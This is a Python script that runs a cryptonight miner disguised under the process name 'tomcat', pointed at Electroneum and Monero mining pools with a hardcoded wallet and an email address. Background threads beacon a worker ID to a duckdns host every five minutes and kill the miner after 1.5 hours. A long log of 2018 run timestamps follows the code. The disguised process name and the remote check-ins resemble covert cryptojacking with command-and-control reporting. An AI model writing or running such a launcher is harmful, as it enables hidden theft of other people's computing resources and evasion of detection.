import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:05.756381
#2018-02-17 17:08:06.786220
#2018-02-17 18:56:06.062369
#2018-02-17 20:36:01.240661
#2018-02-17 22:21:07.537243
#2018-02-18 00:05:05.582228
#2018-02-18 01:56:02.049050
#2018-02-18 03:44:03.875886
#2018-02-18 05:31:04.267794
#2018-02-18 07:23:01.303835
#2018-02-18 09:11:05.320681
#2018-02-18 10:57:05.685103
#2018-02-18 12:44:01.424620
#2018-02-18 14:32:04.387093
#2018-02-18 16:22:06.131014
#2018-02-18 18:11:06.151744
#2018-02-18 19:57:07.477842
#2018-02-18 21:42:07.282727
#2018-02-18 23:31:03.984231
#2018-02-19 01:17:03.653415
#2018-02-19 03:04:06.123997
#2018-02-19 04:50:08.124623
#2018-02-19 06:35:04.889960
#2018-02-19 08:24:05.633750
#2018-02-19 10:14:06.758611
#2018-02-19 12:02:03.926109
#2018-02-19 13:50:11.054421
#2018-02-19 15:40:05.463190
#2018-02-19 17:28:07.906397
#2018-02-19 19:16:02.280189
#2018-02-19 21:03:07.455195
#2018-02-19 22:50:06.145218
#2018-02-20 00:33:05.792992
#2018-02-20 02:21:07.767119
#2018-02-20 04:11:07.013368
#2018-02-20 05:54:07.397663
#2018-02-20 07:40:01.864508
#2018-02-20 09:24:06.479647
#2018-02-20 11:08:05.441113
#2018-02-20 12:55:01.747256
#2018-02-20 14:39:08.574316
#2018-02-20 16:25:12.665131
#2018-02-20 18:11:04.615094
#2018-02-20 20:02:04.546051
#2018-02-20 21:48:05.439343
#2018-02-20 23:30:09.483720
#2018-02-21 01:14:06.302328
#2018-02-21 03:03:07.903286
#2018-02-21 04:51:07.542757
#2018-02-21 06:41:01.829384
#2018-02-21 08:28:03.796880
#2018-02-21 10:13:07.999535
#2018-02-21 12:02:05.880540
#2018-02-21 13:50:10.982880
#2018-02-21 15:36:04.956935
#2018-02-21 17:26:10.228489
#2018-02-21 19:15:08.001081
#2018-02-21 21:04:07.989982
#2018-02-21 22:51:04.247153
#2018-02-22 00:41:05.592800
#2018-02-22 02:28:05.206384
#2018-02-22 04:15:04.915944
#2018-02-22 06:02:02.008910
#2018-02-22 07:47:01.251646
#2018-02-22 09:36:04.566871
#2018-02-22 11:21:04.291364
#2018-02-22 13:06:06.748498
#2018-02-22 14:54:01.531977
#2018-02-22 16:39:08.239731
#2018-02-22 18:25:07.316590
#2018-02-22 20:18:07.251590
#2018-02-22 22:04:08.454100
#2018-02-22 23:50:01.669040
#2018-02-23 01:39:07.957897
#2018-02-23 03:26:01.485509
#2018-02-23 05:12:05.372859
#2018-02-23 06:58:08.320146
#2018-02-23 08:48:04.466840
#2018-02-23 11:11:02.140145
#2018-02-23 13:06:06.131301
#2018-02-23 14:50:11.520564
#2018-02-23 16:40:04.859356
#2018-02-23 18:26:07.026447
#2018-02-23 20:11:01.647610
#2018-02-23 22:00:05.668624
#2018-02-23 23:47:08.139898
#2018-02-24 01:38:04.481230
#2018-02-24 03:27:04.579390
#2018-02-24 05:12:08.016843
#2018-02-24 07:01:01.674004
#2018-02-24 08:50:02.031867
#2018-02-24 10:57:03.515504
#2018-02-24 12:47:05.821153
#2018-02-24 14:36:06.857770
#2018-02-24 16:23:07.105331
#2018-02-24 18:16:07.281784
#2018-02-24 20:03:05.529998
#2018-02-24 21:46:01.300296
#2018-02-25 00:45:04.328351
#2018-02-25 04:34:01.199214
#2018-02-25 08:01:06.547117